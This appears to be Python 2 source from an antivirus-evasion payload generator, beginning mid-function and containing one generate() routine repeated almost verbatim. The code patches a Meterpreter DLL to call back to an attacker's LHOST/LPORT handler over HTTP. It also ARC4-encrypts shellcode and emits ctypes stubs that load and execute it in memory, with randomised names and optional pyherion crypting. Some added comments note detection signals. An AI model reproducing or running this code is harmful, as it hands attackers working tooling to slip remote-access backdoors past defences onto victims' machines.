    headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
    meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

    # patch in the default user agent string (fixed value, NUL-terminated)
    userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
    userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
    meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

    # turn off SSL: overwrite the METERPRETER_TRANSPORT_SSL marker with the HTTP transport name
    sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
    sslString = "METERPRETER_TRANSPORT_HTTP\x00"
    meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

    # replace the URL/port of the handler; the placeholder searched for starts
    # with "https://" while the value written starts with "http://"
    urlIndex = meterpreterDll.index("https://" + ("X" * 256))
    urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
    meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)

    # replace the expiration-timeout placeholder word with 604800
    # (units are not shown here; presumably seconds, i.e. 7 days)
    expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
    expirationTimeout = struct.pack('<I', 604800)
    meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

    # replace the communication-timeout placeholder word with 300
    communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
    communicationTimeout = struct.pack('<I', 300)
    meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

    # compress/encode the dll; helpers.deflate is defined elsewhere, and the
    # stub reverses it with base64 + raw deflate (wbits=-15)
    compressedDll = helpers.deflate(meterpreterDll)

    # actually build out the payload
    payloadCode = ""

    # doing void * cast
    payloadCode += "from ctypes import *\nimport base64,zlib\n"

    randInflateFuncName = randomizer.randomString()
    randb64stringName = randomizer.randomString()
    randVarName = randomizer.randomString()

    # inflate helper emitted into the stub
    payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
    payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
    payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

    randVarName = randomizer.randomString()
    randFuncName = randomizer.randomString()

    payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
    # the inflated bytes are cast to a function pointer and called
    payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
    payloadCode += randFuncName+"()\n"

    # NOTE(review): this generator reads "use_encrypter" where the sibling
    # generators read "use_pyherion" — confirm the option name is declared
    if self.required_options["use_encrypter"][0].lower() == "y":
        payloadCode = crypters.pyherion(payloadCode)

    return payloadCode
def generate(self):
    """Return the source text of a Python 2 ctypes stub carrying ARC4-encrypted shellcode.

    The shellcode from ``self.shellcode.generate()`` is encrypted with ARC4
    under a key from ``randomizer.randomKey(8)``. The emitted stub imports
    ``Crypto.Cipher.ARC4``, rebuilds the cipher from the embedded key and
    decrypts the embedded ciphertext at run time.

    ``inject_method == "virtual"`` selects the VirtualAlloc / RtlMoveMemory /
    CreateThread stub; any other value selects the ``create_string_buffer`` +
    ``CFUNCTYPE`` cast stub. ``use_pyherion == "y"`` passes the result through
    ``crypters.pyherion`` (defined elsewhere).

    Review note (detection): the ARC4 key is written into the stub as a plain
    string literal next to the ciphertext, so the plaintext is recoverable from
    the script alone. An ``iv`` value is generated and emitted as well, but the
    visible code never passes it to ``ARC4.new``.
    """
    if self.required_options["inject_method"][0].lower() == "virtual":
        # Obtain the shellcode (per the original comment, generated via msfvenom)
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandARCKey = randomizer.randomString()
        RandARCPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()

        # Set IV Value and ARC Key (iv is only emitted into the stub, not used by the cipher here)
        iv = randomizer.randomKey(8)
        ARCKey = randomizer.randomKey(8)

        # Create ARC4 cipher object and encrypt the payload
        arc4main = ARC4.new(ARCKey)
        EncShellCode = arc4main.encrypt(Shellcode)

        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        PayloadCode += 'import ctypes\n'
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        # key embedded in clear text in the generated script
        PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
        PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
        PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
        # a read-write-execute allocation, a common behavioural detection signal
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # c_int(-1) is the INFINITE timeout: the stub blocks on the new thread
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode

    else:
        # Obtain the shellcode (per the original comment, generated via msfvenom)
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        RandPtr = randomizer.randomString()  # drawn but not used in this branch
        RandBuf = randomizer.randomString()  # drawn but not used in this branch
        RandHt = randomizer.randomString()  # drawn but not used in this branch
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandARCKey = randomizer.randomString()
        RandARCPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()
        RandShellcode = randomizer.randomString()
        RandReverseShell = randomizer.randomString()  # drawn but not used in this branch
        RandMemoryShell = randomizer.randomString()

        # Set IV Value and ARC Key (iv is only emitted into the stub, not used by the cipher here)
        iv = randomizer.randomKey(8)
        ARCKey = randomizer.randomKey(8)

        # Create ARC4 cipher object and encrypt the payload
        arc4main = ARC4.new(ARCKey)
        EncShellCode = arc4main.encrypt(Shellcode)

        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        PayloadCode += 'from ctypes import *\n'
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        # key embedded in clear text in the generated script
        PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
        PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
        PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
        # The stub casts a ctypes string buffer to a function pointer and calls it,
        # i.e. it executes a data buffer as code
        PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
        PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
        PayloadCode += RandShellcode + '()'

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode
def generate(self):
    """Return the source text of a Python 2 ctypes stub carrying ARC4-encrypted shellcode.

    Encrypts the output of ``self.shellcode.generate()`` with ARC4 using a key
    from ``randomizer.randomKey(8)`` and emits a stub that imports
    ``Crypto.Cipher.ARC4``, recreates the cipher from the embedded key and
    decrypts the embedded ciphertext before running it.

    ``inject_method == "virtual"`` emits the VirtualAlloc / RtlMoveMemory /
    CreateThread sequence; any other value emits the ``create_string_buffer``
    + ``CFUNCTYPE`` cast variant. When ``use_pyherion`` is "y" the text is
    passed through ``crypters.pyherion`` (defined elsewhere).

    Review note (detection): key and ciphertext sit side by side as string
    literals in the generated script, so static analysis can decrypt the
    payload without executing it. The ``iv`` that is generated and emitted is
    never handed to ``ARC4.new`` in the visible code.
    """
    if self.required_options["inject_method"][0].lower() == "virtual":
        # Obtain the shellcode (per the original comment, generated via msfvenom)
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        RandPtr = randomizer.randomString()
        RandBuf = randomizer.randomString()
        RandHt = randomizer.randomString()
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandARCKey = randomizer.randomString()
        RandARCPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()

        # Set IV Value and ARC Key (iv is only emitted into the stub, not used by the cipher here)
        iv = randomizer.randomKey(8)
        ARCKey = randomizer.randomKey(8)

        # Create ARC4 cipher object and encrypt the payload
        arc4main = ARC4.new(ARCKey)
        EncShellCode = arc4main.encrypt(Shellcode)

        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        PayloadCode += 'import ctypes\n'
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        # key embedded in clear text in the generated script
        PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
        PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
        PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
        # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE:
        # a read-write-execute allocation, a common behavioural detection signal
        PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
        PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
        PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        # c_int(-1) is the INFINITE timeout: the stub blocks on the new thread
        PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode

    else:
        # Obtain the shellcode (per the original comment, generated via msfvenom)
        Shellcode = self.shellcode.generate()

        # Generate Random Variable Names
        RandPtr = randomizer.randomString()  # drawn but not used in this branch
        RandBuf = randomizer.randomString()  # drawn but not used in this branch
        RandHt = randomizer.randomString()  # drawn but not used in this branch
        ShellcodeVariableName = randomizer.randomString()
        RandIV = randomizer.randomString()
        RandARCKey = randomizer.randomString()
        RandARCPayload = randomizer.randomString()
        RandEncShellCodePayload = randomizer.randomString()
        RandShellcode = randomizer.randomString()
        RandReverseShell = randomizer.randomString()  # drawn but not used in this branch
        RandMemoryShell = randomizer.randomString()

        # Set IV Value and ARC Key (iv is only emitted into the stub, not used by the cipher here)
        iv = randomizer.randomKey(8)
        ARCKey = randomizer.randomKey(8)

        # Create ARC4 cipher object and encrypt the payload
        arc4main = ARC4.new(ARCKey)
        EncShellCode = arc4main.encrypt(Shellcode)

        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        PayloadCode += 'from ctypes import *\n'
        PayloadCode += RandIV + ' = \'' + iv + '\'\n'
        # key embedded in clear text in the generated script
        PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
        PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
        PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
        PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
        # The stub casts a ctypes string buffer to a function pointer and calls it,
        # i.e. it executes a data buffer as code
        PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
        PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
        PayloadCode += RandShellcode + '()'

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = crypters.pyherion(PayloadCode)

        return PayloadCode